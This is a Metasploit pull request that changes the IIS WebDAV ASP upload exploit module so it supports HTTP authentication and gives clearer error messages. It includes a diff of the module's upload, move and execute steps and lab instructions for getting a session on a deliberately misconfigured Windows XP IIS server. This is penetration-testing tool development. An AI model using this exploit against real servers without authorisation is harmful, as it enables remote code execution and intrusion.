### PR TITLE
Fix #4115 - iis_webdav_upload_asp.rb should support http auth

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -149,7 +149,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if (res.code < 200 or res.code >= 300)
-      print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")
+      # Changed this to a warning, because red is scary and if this aprt fails,
+      # honestly it's not that bad. In most cases this is probably expected anyway
+      # because by default we're using IWAM_*, which doesn't give us a lot of
+      # freedom to begin with.
+      print_warning("Deletion failed on #{path} [#{res.code} #{res.message}]")
       return
     end
 

--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -17,7 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           This module can be used to execute a payload on IIS servers that
         have world-writeable directories. The payload is uploaded as an ASP
-        script using a WebDAV PUT request.
+        script via a WebDAV PUT request.
+
+          The target IIS machine must meet these conditions to be considered
+        as exploitable: It allows 'Script resource access', Read and Write
+        permission, and supports ASP.
       },
       'Author'      => 'hdm',
       'Platform'    => 'win',
@@ -36,6 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
+        # The USERNAME and PASSWORD are registered again to make them more obvious they're
+        # configurable.
+        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', '']),
         OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
       ], self.class)
   end
@@ -53,24 +61,25 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     print_status("Uploading #{asp.length} bytes to #{path_tmp}...")
 
-    res = send_request_cgi({
-      'uri'          =>  path_tmp,
-      'method'       => 'PUT',
-      'ctype'        => 'application/octet-stream',
-      'data'         => asp,
-    }, 20)
+    begin
+      res = send_request_cgi({
+        'uri'          =>  path_tmp,
+        'method'       => 'PUT',
+        'ctype'        => 'application/octet-stream',
+        'data'         => asp,
+      }, 20)
+    rescue Errno::ECONNRESET => e
+      print_error("#{e.message}. It's possible either you set the PATH option wrong, or IIS doesn't allow 'Write' permission.")
+      return
+    end
 
     if (! res)
-      print_error("Upload failed on #{path_tmp} [No Response]")
+      print_error("Connection timed out while uploading to #{path_tmp}")
       return
     end
 
     if (res.code < 200 or res.code >= 300)
       print_error("Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
-      case res.code
-      when 401
-        print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
-      end
       return
     end
 
@@ -86,17 +95,15 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_error("Move failed on #{path_tmp} [No Response]")
+      print_error("Connection timed out while moving to #{path}")
       return
     end
 
     if (res.code < 200 or res.code >= 300)
       print_error("Move failed on #{path_tmp} [#{res.code} #{res.message}]")
       case res.code
-      when 401
-        print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
       when 403
-        print_warning("Warning: The web site may not allow 'Script Source Access', which is required to upload executable content.")
+        print_error("IIS possibly does not allow 'Read' permission, which is required to upload executable content.")
       end
       return
     end
@@ -118,6 +125,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if (res.code < 200 or res.code >= 300)
       print_error("Execution failed on #{path} [#{res.code} #{res.message}]")
+      case res.message
+      when 'Object Not Found'
+        print_error("The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'.")
+      end
       return
     end
 


### PR DESCRIPTION
HTTP auth is already implemented in Rex so there is really no point to say it can't do it. I also changed the error/warning messages to be more informative about why the module fails.
## Setup for verification
- [x] Windows XP SP3
- [x] IIS 5.1. If you don't have this, you can install it from the Windows Components Wizard.
- [x] For testing purposes, make sure no firewall
- [x]  After the IIS installation, create a folder in C:\Inetpub\wwwroot\upload
- [x] Add a new user "Everyone" to the "upload" folder, and grant "Full Control" to it. You need this setting for Verification 1. But Integrated Windows authentication doesn't need this setting.
- [x] Make sure you know the password for the default Windows user (which I think is Administrator). Set one if it's blank: `net user Administrator [password]` in command prompt.
- [x] Go to Administrative Tools -> Internet Information Services.
- [x] Right click on the 'upload' folder, go to Properties
- [x] Check Script source access
- [x] Check Read
- [x] Check Write
## Verification 1: Test without auth
- [x] Start msfconsole
- [x] `use exploits/windows/iis/iis_webdav_upload_asp`
- [x] `set rhost [IP]`
- [x] `set path /upload/test.asp`
- [x] `run`
- [x] You should get a session
- [x] When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.
## Verification 2: Test with Windows authentication

In order to test authentication, you need to Administrative Tools -> Internet Information Services and configure a few things:
- [x] Right click on the 'upload' folder, go to Properties
- [x] Click on the 'Directory Security' tab
- [x] Click on 'Edit' under 'Anonymous access and authentication control'
- [x] Uncheck 'Anonymous access'
- [x] Check 'Integrated Windows authentication'

Ok, then you're ready to test:
- [x] Start msfconsole
- [x] `use exploits/windows/iis/iis_webdav_upload_asp`
- [x] `set rhost [IP]`
- [x] `set path /upload/test.asp`
- [x] `set username [valid username]`
- [x] `set password [valid password]`
- [x] `run`
- [x] You should get a session

If you want, you can also test with a bad username/password too. In that case, you should see "401 Access Denied" when the module tries to upload the ASP file.
- [x] When you're done with this test, make sure to remove C:\Inetpub\wwwroot\upload\test.asp for the next test.
## Verification 3: Script source access permission

Before you test this, make sure that:
- [x] You are still using the same auth instructed from Verification 2
- [x] Back to your IIS manager, right click on the 'upload' folder -> Properties
- [x] Make sure the "Script source access" is unchecked.
- [x] This time, your exploit will fail, and you should see this message: "The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'."
## Verification 4: Read permission
- [x] Still the same auth from Verification 2
- [x] This time, make sure 'Read' is unchecked. (but the other two such as "Script source access" and "write" should be checked)
- [x] Run the exploit, and you should see: "IIS possibly does not allow 'Read' permission"
## Verification 5: Write permission
- [x] Still the same auth from Verification 2
- [x] This time, make sure 'Write' is unchecked. (but the other two such as "Script source access" and "read" should be checked)
- [ ] Run the exploit, and you should see: "It's possible either you set the PATH option wrong, or IIS doesn't allow Write permission"
